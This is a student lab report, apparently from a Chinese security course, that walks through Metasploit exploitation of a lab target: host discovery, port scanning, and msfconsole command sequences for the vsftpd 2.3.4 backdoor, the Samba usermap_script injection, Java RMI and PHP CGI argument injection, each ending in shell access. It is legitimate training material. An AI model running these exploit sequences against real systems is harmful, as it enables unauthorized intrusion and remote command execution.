20232406 2025-2026-1 《网络与系统攻防技术》 实验六实验报告

一、实验内容

1.实验内容

（1）前期渗透

①主机发现（可用Aux中的arp_sweep，search一下就可以use）

②端口扫描：可以直接用nmap，也可以用Aux中的portscan/tcp等。

③选做：也可以扫系统版本、漏洞等。

（2）Vsftpd源码包后门漏洞（21端口）

漏洞原理：在特定版本的vsftpd服务器程序中，被人恶意植入代码，当用户名以“: )”为结尾，服务器就会在6200端口监听，并且能够执行任意代码。

（3）SambaMS-RPC Shell命令注入漏洞（端口139）
漏洞原理：Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时，通过对/bin/sh的MS-RPC调用提交了恶意输入的话，就可能允许攻击者以nobody用户的权限执行任意命令。

（4）Java RMI SERVER命令执行漏洞（1099端口）

漏洞原理：Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞，可被利用导致代码执行。

（5）PHP CGI参数执行注入漏洞（80端口）

漏洞原理：CGI脚本没有正确处理请求参数，导致源代码泄露，允许远程攻击者在请求参数中插入执行命令。

2.学习总结

1）MST基本框架

Metasploit：是一款开源安全漏洞利用和测试工具，集成了各种平台上常见的溢出漏洞和流行的shellcode。

2）基本命令

指定设置的模块

use [auxiliary（辅助模块）&exploit（攻击模块）&payload（攻击载荷）&encode（编译器模块）]

显示可使用的模块或选项

show [exploits&payloads&encoder&auxiliary&options]：

设定选项或模块

set [options&payload]

启用模块

run&exploit

取消当前指定模块，同时返回上级目录

back

查看这个模块的详情

info

搜索符合条件的模块

search

检查指定特定目标是否存在安全漏洞，并且能被exploit（攻击模块）利用

check

查看当前会话

sessions

二、实验过程

1.前期渗透

1）主机发现

获取靶机ip地址。使用ifconfig得到地址为192.168.226.157

输入msfconsole进入msf控制台
依次输入

search arp_sweep
use 0
set RHOSTS 192.128.226.157
run

输入nmap -p 1-2048 192.168.226.157查看靶机开放的端口

2.使用Aux中的portscan/tcp
输入以下命令

search portscan/tcp
use 0
set RHOSTS 192.168.226.157
exploit

3）选做：系统版本扫描

依次输入

search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.226.157
exploit

2.Vsftpd源码包后门漏洞（21端口）

1）执行攻击

在msfconsole中，依次输入以下命令

search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOSTS 192.168.226.157
run

2）验证攻击

执行uname –a、 pwd、 id等命令 验证

3.SambaMS-RPC Shell命令注入漏洞（端口139）

1）执行攻击

在msfconsole中，依次输入以下命令

search exploit/multi/samba/usermap_script
use 0
set RHOSTS 192.168.226.157
run

2）验证攻击

执行uname –a、 pwd、 id等命令验证

4.Java RMI SERVER命令执行漏洞（1099端口）

1）执行攻击

在msfconsole中，依次输入以下命令

search exploit/multi/misc/java_rmi_server
use 0
set RHOSTS 192.168.226.157
run

2）验证攻击

执行uname –a、 pwd、 id等命令验证

5.PHP CGI参数执行注入漏洞（80端口）

1）执行攻击

在msfconsole中，依次输入以下命令

search use exploit/multi/http/php_cgi_arg_injection
use 0
set RHOSTS 192.168.226.157
run

2）验证攻击

输入shell获取shell
执行uname –a、 pwd、 id等命令验证

三、问题及解决方案

-无

四、学习感悟、思考

在实验前，我对 Metasploit 的认知仅停留在 “调用模块” 的表层操作，而本次实验让我实现了从 “工具使用者” 到 “原理理解者” 的转变。例如针对Vsftpd 2.3.4 后门漏洞（21 端口） 的利用，起初我仅按步骤输入指令，当看到攻击成功后靶机 6200 端口开放并获取 root 权限时，虽有成就感却不明其理。直到回顾漏洞原理 ——“恶意植入代码监测用户名末尾的‘😃’符号，触发后门并开放端口”，我才意识到：这类人为植入的后门漏洞，本质是软件供应链安全的缺失，也让我明白 “使用过时软件版本” 会带来的致命风险。
实验初期的前期渗透环节（主机发现、端口扫描、漏洞探测），让我深刻体会到 “信息收集决定渗透成败”。在主机发现阶段，我最初使用普通用户权限运行arp_sweep模块，结果因 “权限不足无法捕获网段数据” 失败，这与之前解决 “Socket: OPERATION not permitted” 错误的经验相呼应，最终通过sudo msfconsole以 root 权限启动框架，成功定位到靶机 IP（192.168.226.151）。这一细节让我明白：权限管理是网络安全的基础，即使是合法的渗透测试，也需遵循 “最小权限原则” 与 “授权操作规范”。
端口扫描环节，我同时尝试了nmap -sS -sV与 Metasploit 的portscan/tcp模块。对比发现，nmap 的版本探测更精准（如明确 21 端口为 vsftpd 2.3.4），而 Metasploit 模块可直接将扫描结果与漏洞库关联，两者结合能形成 “信息互补”。这让我总结出：渗透测试中不存在 “单一最优工具”，需根据场景选择合适工具，而 “多工具交叉验证” 是提升信息准确性的关键。

参考资料

• Metasploitable 2 Exploitability Guide